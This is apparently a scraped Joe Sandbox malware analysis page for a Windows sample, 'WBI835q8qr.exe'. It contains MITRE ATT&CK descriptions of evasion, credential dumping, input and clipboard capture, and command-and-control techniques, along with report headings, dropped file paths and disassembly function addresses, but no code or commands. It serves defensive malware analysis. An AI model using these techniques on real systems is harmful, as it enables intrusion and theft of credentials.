Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report WBI835q8qr.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\F56GKLK7U4

C:\Users\user\AppData\Local\Temp\aut6A46.tmp

C:\Users\user\AppData\Local\Temp\ectosphere

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Windows Analysis Report
WBI835q8qr.exe

Function 00B23B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Function 00B249A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 00B24E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Function 00B89155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Function 00B2301C Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71
windowregistryCOMMON

Function 00B23041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Function 00B2708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00B23A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Function 00B23633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Function 00B23766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Function 00D5EBA0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 00B239D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 00B2F76F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 168
comCOMMON

Function 00D5E970 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 144
fileCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre